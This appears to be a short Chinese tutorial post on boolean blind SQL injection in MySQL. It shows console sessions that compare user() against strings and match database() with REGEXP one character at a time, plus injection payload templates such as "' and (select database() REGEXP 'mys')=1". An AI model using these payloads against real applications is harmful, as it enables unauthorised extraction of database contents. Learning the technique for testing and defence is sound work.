Mysql盲注时的判断方法，REGEXP逐个匹配

        
          
            
              mysql
              >
               select 
              *
               
              from
               test where id 
              =
              1
               
              and
               
              (
              
                select user
              
              ())
               
              
                
                  >
                
                 
              
              'roo'
              ;
            
          
          
            
              +------+------+
            
          
          
            
              |
               id   
              |
               name 
              |
            
          
          
            
              +------+------+
            
          
          
            
              |
                  
              1
               
              |
               bma  
              |
            
          
          
            
              |
                  
              1
               
              |
               a
              '   |
            
          
          
            
              |    1 | bma  |
            
          
          
            
              +------+------+
            
          
          
            
              3 rows in set (0.00 sec)
            
          
          
            
          

          
            
              mysql> select * from test where id =1 and (select user()) > '
              rox
              ';
            
          
          
            
              Empty set (0.00 sec)


    尝试这样：
' and (SQL)=1 
and (select database() REGEXP 'mys')=1 
sql 规律如下，用boolean 盲注
mysql> select database() REGEXP 'm';        //用正则来判断
+-----------------------+
| database() REGEXP 'm' |
+-----------------------+
|                     1 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select database() REGEXP 'my';
+------------------------+
| database() REGEXP 'my' |
+------------------------+
|                      1 |
+------------------------+
1 row in set (0.00 sec)

mysql> select database() REGEXP 'mys';
+-------------------------+
| database() REGEXP 'mys' |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

mysql> select database() REGEXP 'mysq';
+--------------------------+
| database() REGEXP 'mysq' |
+--------------------------+
|                        1 |
+--------------------------+
1 row in set (0.00 sec)



previous page
 start
 next page